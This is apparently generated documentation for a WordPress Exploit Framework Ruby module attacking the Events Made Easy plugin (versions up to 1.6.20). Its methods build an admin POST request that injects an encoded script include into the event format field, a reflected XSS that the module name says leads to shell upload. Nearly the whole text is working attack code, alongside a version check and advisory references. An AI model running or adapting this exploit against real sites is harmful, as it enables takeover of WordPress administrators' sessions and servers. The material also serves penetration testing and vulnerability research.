class Wpxf::Exploit::EventsMadeEasyReflectedXssShellUpload

Public Class Methods

new() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Events MAde Easy <= 1.6.20 Reflected XSS Shell Upload',
    author: [
      'Job Diesveld', # Discovery
      'rastating'     # WPXF module
    ],
    references: [
      ['WPVDB', '8595'],
      ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html']
    ],
    date: 'Aug 04 2016'
  )

  register_option(
    IntegerOption.new(
      name: 'event_id',
      desc: 'A valid event ID (can be found in the URL of an event page)',
      required: true
    )
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 31
def check
  check_plugin_version_from_readme('events-made-easy', '1.6.21')
end
event_id() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 35
def event_id
  normalized_option_value('event_id')
end
form_fields() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 47
def form_fields
  {
    'event_status' => [1, 2, 5].sample,
    'event_contactperson_id' => -1,
    'event_seats' => 0,
    'price' => 0,
    'currency' => 'EUR',
    'eme_prop_max_allowed' => Utility::Text.rand_numeric(2),
    'eme_prop_min_allowed' => Utility::Text.rand_numeric(1),
    'eme_prop_rsvp_discount' => '',
    'eme_prop_rsvp_discountgroup' => '',
    'rsvp_number_days' => Utility::Text.rand_numeric(1),
    'rsvp_number_hours' => Utility::Text.rand_numeric(1),
    'eme_prop_rsvp_end_target' => 'start',
    'event_name' => Utility::Text.rand_alphanumeric(10),
    'event_slug' => Utility::Text.rand_alphanumeric(10),
    'localised_recurrence_date' => Time.now.strftime('%d/%m/%Y'),
    'recurrence_start_date' => Time.now.strftime('%Y-%m-%d'),
    'localised_recurrence_end_date' => Time.now.strftime('%d/%m/%Y'),
    'recurrence_end_date' => Time.now.strftime('%Y-%m-%d'),
    'recurrence_freq' => ['daily', 'weekly', 'monthly'].sample,
    'recurrence_interval' => '',
    'recurrence_byweekno' => 1,
    'recurrence_byday' => 1,
    'localised_event_start_date' => Time.now.strftime('%d/%m/%Y'),
    'event_start_date' => Time.now.strftime('%Y-%m-%d'),
    'localised_event_end_date' => Time.now.strftime('%d/%m/%Y'),
    'event_end_date' => Time.now.strftime('%Y-%m-%d'),
    'event_start_time' => Time.now.strftime('%I:%M%p'),
    'event_end_time' => Time.now.strftime('%I:%M%p'),
    'eme_prop_event_page_title_format_tpl' => 0,
    'event_page_title_format' => Utility::Text.rand_alphanumeric(10),
    'eme_prop_event_single_event_format_tpl' => 0,
    'event_single_event_format' => "<script>#{xss_ascii_encoded_include_script}<\\/script>",
    'eme_prop_event_contactperson_email_body_tpl' => 0,
    'event_contactperson_email_body' => '',
    'eme_prop_event_registration_recorded_ok_html_tpl' => 0,
    'event_registration_recorded_ok_html' => '',
    'eme_prop_event_respondent_email_body_tpl' => 0,
    'event_respondent_email_body' => '',
    'eme_prop_event_registration_pending_email_body_tpl' => 0,
    'event_registration_pending_email_body' => '',
    'eme_prop_event_registration_updated_email_body_tpl' => 0,
    'event_registration_updated_email_body' => '',
    'eme_prop_event_registration_cancelled_email_body_tpl' => 0,
    'event_registration_cancelled_email_body' => Utility::Text.rand_alphanumeric(10),
    'eme_prop_event_registration_denied_email_body_tpl' => 0,
    'event_registration_denied_email_body' => Utility::Text.rand_alphanumeric(10),
    'eme_prop_event_registration_form_format_tpl' => 0,
    'event_registration_form_format' => '',
    'eme_prop_event_cancel_form_format_tpl' => 0,
    'event_cancel_form_format' => '',
    'location_name' => Utility::Text.rand_alphanumeric(5),
    'location_address' => Utility::Text.rand_alphanumeric(5),
    'location_town' => Utility::Text.rand_alphanumeric(5),
    'location_latitude' => '',
    'location_longitude' => '',
    'content' => Utility::Text.rand_alphanumeric(10),
    'event_image_url' => '',
    'event_image_id' => '',
    'event_url' => '',
    'event_update_button' => ''
  }
end
initial_script() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 43
def initial_script
  create_basic_post_script(vulnerable_url, form_fields)
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 39
def vulnerable_url
  normalize_uri(wordpress_url_admin, "admin.php?page=events-manager&eme_admin_action=update_event&event_id=#{event_id}")
end